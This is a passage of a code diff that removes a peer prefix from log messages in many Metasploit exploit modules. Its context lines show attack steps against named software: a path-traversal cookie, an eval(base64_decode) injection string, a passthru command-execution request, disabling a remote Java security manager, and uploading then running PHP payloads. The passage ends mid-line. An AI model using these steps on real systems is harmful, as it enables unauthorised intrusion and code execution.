@@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| if var != 0 && var % 1000 == 0 - vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + vprint_status("Parsed #{var} classes of #{nb_entries}") end data = {} @@ -691,13 +691,13 @@ class Metasploit3 < Msf::Exploit::Remote path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" if @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Linux target...") + print_warning("#{@os} system detected but using Linux target...") end when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" unless @os.downcase =~ /win/ - print_warning("#{peer} - #{@os} system detected but using Windows target...") + print_warning("#{@os} system detected but using Windows target...") end end @@ -837,7 +837,7 @@ class Metasploit3 < Msf::Exploit::Remote # 2. Suspend the VM before setting the event suspend_vm - vprint_status("#{peer} - Setting 'step into' event in thread: #{t_id}") + vprint_status("Setting 'step into' event in thread: #{t_id}") step_info = format(@vars["objectid_size"], t_id) step_info << [STEP_MIN].pack('N') step_info << [STEP_INTO].pack('N') @@ -868,13 +868,13 @@ class Metasploit3 < Msf::Exploit::Remote value = get_value(sys_class["reftype_id"], sec_field) if(value == 0) - print_good("#{peer} - Security manager was not set") + print_good("Security manager was not set") else set_value(sys_class["reftype_id"], sec_field, 0) if get_value(sys_class["reftype_id"], sec_field) == 0 - print_good("#{peer} - Security manager has been disabled") + print_good("Security manager has been disabled") else - print_good("#{peer} - Security manager has not been disabled, trying anyway...") + print_good("Security manager has not been disabled, trying anyway...") end end end @@ -884,7 +884,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0. Fingerprinting OS fingerprint_os(thread_id) - vprint_status("#{peer} - Executing payload on \"#{@os}\", target version: #{version}") + vprint_status("Executing payload on \"#{@os}\", target version: #{version}") # 1. Prepares the payload payload_exe, pl_exe = setup_payload @@ -927,27 +927,27 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end - print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...") + print_status("Retrieving the sizes of variable sized data types in the target VM...") get_sizes - print_status("#{peer} - Getting the version of the target VM...") + print_status("Getting the version of the target VM...") get_version - print_status("#{peer} - Getting all currently loaded classes by the target VM...") + print_status("Getting all currently loaded classes by the target VM...") get_all_classes - print_status("#{peer} - Getting all running threads in the target VM...") + print_status("Getting all running threads in the target VM...") get_all_threads - print_status("#{peer} - Setting 'step into' event...") + print_status("Setting 'step into' event...") r_id, t_id = set_step_event - print_status("#{peer} - Resuming VM and waiting for an event...") + print_status("Resuming VM and waiting for an event...") response = resume_vm unless parse_event(response, r_id, t_id) datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Received #{i + 1} responses that are not a 'step into' event...") + print_status("Received #{i + 1} responses that are not a 'step into' event...") buf = read_reply break if parse_event(buf, r_id, t_id) @@ -957,14 +957,14 @@ class Metasploit3 < Msf::Exploit::Remote end end - vprint_status("#{peer} - Received matching event from thread #{t_id}") - print_status("#{peer} - Deleting step event...") + vprint_status("Received matching event from thread #{t_id}") + print_status("Deleting step event...") clear_event(EVENT_STEP, r_id) - print_status("#{peer} - Disabling security manager if set...") + print_status("Disabling security manager if set...") disable_sec_manager - print_status("#{peer} - Dropping and executing payload...") + print_status("Dropping and executing payload...") exec_payload(t_id) disconnect diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index d5221281f4..2823fe48f0 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -131,18 +131,18 @@ class Metasploit3 < Msf::Exploit::Remote @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end - print_status("#{peer} - Discovering the JMXRMI endpoint...") + print_status("Discovering the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else - print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") + print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end # First try to connect to the original RHOST, since the mbean address may be inaccessible @@ -157,20 +157,20 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end - print_status("#{peer} - Proceeding with handshake...") + print_status("Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else - print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") + print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end - print_status("#{peer} - Loading payload...") + print_status("Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_jmx_invoke( object_number: jmx_endpoint[:object_number], uid_number: jmx_endpoint[:uid].number, @@ -199,7 +199,7 @@ class Metasploit3 < Msf::Exploit::Remote return nil if ref.nil? unless ref[:object] == 'javax.management.remote.rmi.RMIServerImpl_Stub' - vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{ref[:object]}") + vprint_error("JMXRMI discovery returned unexpected object #{ref[:object]}") return nil end @@ -223,7 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote ref = send_new_client(opts) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - JMXRMI discovery raised an exception of type #{e.message}") + vprint_error("JMXRMI discovery raised an exception of type #{e.message}") return nil end @@ -231,7 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload(conn_stub) - vprint_status("#{peer} - Getting JMXPayload instance...") + vprint_status("Getting JMXPayload instance...") begin res = send_jmx_get_object_instance( @@ -244,10 +244,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceNotFoundException' - vprint_warning("#{peer} - JMXPayload instance not found, trying to load") + vprint_warning("JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) else - vprint_error("#{peer} - getObjectInstance returned unexpected exception #{e.message}") + vprint_error("getObjectInstance returned unexpected exception #{e.message}") return false end end @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote end def load_payload_from_url(conn_stub) - vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") + vprint_status("Creating javax.management.loading.MLet MBean...") begin res = send_jmx_create_mbean( @@ -272,23 +272,23 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::Proto::Rmi::Exception => e case e.message when 'javax.management.InstanceAlreadyExistsException' - vprint_good("#{peer} - javax.management.loading.MLet already exists") + vprint_good("javax.management.loading.MLet already exists") res = true when 'java.lang.SecurityException' - vprint_error("#{peer} - The provided user hasn't enough privileges") + vprint_error(" The provided user hasn't enough privileges") res = nil else - vprint_error("#{peer} - createMBean raised unexpected exception #{e.message}") + vprint_error("createMBean raised unexpected exception #{e.message}") res = nil end end if res.nil? - vprint_error("#{peer} - The request to createMBean failed") + vprint_error("The request to createMBean failed") return false end - vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") + vprint_status("Getting javax.management.loading.MLet instance...") begin res = send_jmx_get_object_instance( object_number: conn_stub[:object_number], @@ -298,16 +298,16 @@ class Metasploit3 < Msf::Exploit::Remote name: 'DefaultDomain:type=MLet' ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - getObjectInstance returned unexpected exception: #{e.message}") + vprint_error("getObjectInstance returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The request to GetObjectInstance failed") + vprint_error("The request to GetObjectInstance failed") return false end - vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") + vprint_status("Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") begin res = send_jmx_invoke( @@ -320,12 +320,12 @@ class Metasploit3 < Msf::Exploit::Remote args: { 'java.lang.String' => "#{get_uri}/mlet" } ) rescue ::Rex::Proto::Rmi::Exception => e - vprint_error("#{peer} - invoke() returned unexpected exception: #{e.message}") + vprint_error("invoke() returned unexpected exception: #{e.message}") return false end if res.nil? - vprint_error("#{peer} - The call to getMBeansFromURL failed") + vprint_error("The call to getMBeansFromURL failed") return false end diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index 90f87dea99..7e2133acab 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer connect - print_status("#{peer} - Sending RMI Header...") + print_status("Sending RMI Header...") send_header ack = recv_protocol_ack if ack.nil? @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote jar = rand_text_alpha(rand(8)+1) + '.jar' new_url = get_uri + '/' + jar - print_status("#{peer} - Sending RMI Call...") + print_status("Sending RMI Call...") dgc_interface_hash = calculate_interface_hash( [ { diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index f35930adfb..0e39c322d6 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.close - print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") + print_status("Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 4fdbb98670..1b2de6b94b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return Exploit::CheckCode::Unknown end @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote version = $2 build = $1 - vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected") + vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected") else - vprint_status("#{peer} - Unexpected vmtadmin.cgi response") + vprint_status("Unexpected vmtadmin.cgi response") return Exploit::CheckCode::Unknown end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return nil end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") end - print_status("#{peer} - Blind Exploitation - unknown exploitation state") + print_status("Blind Exploitation - unknown exploitation state") return end diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 8cb29c5e9f..99d0bc71fd 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -65,22 +65,22 @@ class Metasploit3 < Msf::Exploit::Remote # check for aa.php res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error("#{peer} - Could not find aa.php") + vprint_error("Could not find aa.php") return Exploit::CheckCode::Safe elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ - vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + vprint_error("ActualAnalyzer is not installed. Try installing first.") return Exploit::CheckCode::Detected end # check version res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body - vprint_status("#{peer} - Found version: #{version}") + vprint_status("Found version: #{version}") if Gem::Version.new(version) <= Gem::Version.new('2.81') report_vuln( host: rhost, @@ -124,12 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on view.php") + vprint_status("Could not find any hosts on view.php") end nil end @@ -146,12 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on code.php") + vprint_status("Could not find any hosts on code.php") end nil end @@ -184,12 +184,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && res.body =~ />Login</ - vprint_status("#{peer} - Login failed.") + vprint_status("Login failed.") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") - print_good("#{peer} - Login successful! (#{user}:#{pass})") + vprint_good("Found analytics host: #{analytics_host}") + print_good("Login successful! (#{user}:#{pass})") service_data = { address: Rex::Socket.getaddress(rhost, true), port: rport, @@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote create_credential_login(login_data) return analytics_host else - vprint_status("#{peer} - Could not find any hosts on admin.php") + vprint_status("Could not find any hosts on admin.php") end nil end @@ -230,10 +230,10 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out") elsif res.code == 302 && res.headers['Content-Type'] =~ /image/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") return true elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/ - vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") + vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") elsif res.code == 200 && res.body =~ /Admin area<\/title>/ fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.") else @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote end analytics_hosts.uniq.each do |host| next if host.nil? - vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") + vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") break if execute_command(payload.encoded, analytics_host: host) end end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9b029120b6..c97f321c9a 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") + print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "scripts", "upload.php"), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("/tmp/ApplianceUpdate") - print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") + print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 55abc7908c..2c98d91f63 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php" - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"), @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) + print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 10291ae9a6..d39e728937 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the preg_replace() to execute PHP code") + print_status("Exploiting the preg_replace() to execute PHP code") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a218ee92b0..8b24944c6f 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), @@ -102,11 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index b4cb968c14..6324068bf5 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ return Exploit::CheckCode::Appears @@ -132,14 +132,14 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path # upload - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) # register the file to clean register_files_for_cleanup(fname) # exec - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index 58afa2be55..f530c09ab0 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5c2569966f..5d3afc9353 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} found") + print_status("Version #{version} found") if Gem::Version.new(version) <= Gem::Version.new('3.1.2') return Exploit::CheckCode::Appears @@ -103,34 +103,34 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating...") + print_status("Authenticating...") res = send_request_auth if res && res.code == 302 - print_status("#{peer} - The authentication process is done successfully!") + print_status("The authentication process is done successfully!") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Extracting Cookies Information...") + print_status("Extracting Cookies Information...") cookie = res.get_cookies if cookie.blank? fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht' res = send_request_upload(payload_name, cookie) if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</ upload_path = $1 - print_good("#{peer} - File uploaded to #{upload_path}") + print_good("File uploaded to #{upload_path}") register_file_for_cleanup(payload_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_raw({ 'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 13ce643e2e..8840dc855c 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - vprint_error "#{peer} - Authentication failed" + vprint_error "Authentication failed" return Exploit::CheckCode::Unknown end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 303 @session_id = res.get_cookies - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" end end @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' @session_id = "" - print_status "#{peer} - Trying login" + print_status "Trying login" login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status "#{peer} - Authentication successfully, trying to exploit" + print_status "Authentication successfully, trying to exploit" data = "rs=passthru&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 or not res.body =~ /\+/ - print_error "#{peer} - Exploitation failed" + print_error "Exploitation failed" return end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 311d36732b..f76388a42d 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears end @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92437ae125..ecfd1ac294 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Testing injection...") + print_status("Testing injection...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...") end - print_status("#{peer} - Exploiting the unserialize()...") + print_status("Exploiting the unserialize()...") send_request_exploit(payload.encoded) end diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 2ca9e0026e..6b495eed60 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res - vprint_error "#{peer} - Connection failed" + vprint_error "Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error "#{peer} - Could not find install.php" + vprint_error "Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ - vprint_error "#{peer} - #{$1} is not writable" + vprint_error "#{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else - vprint_error "#{peer} - 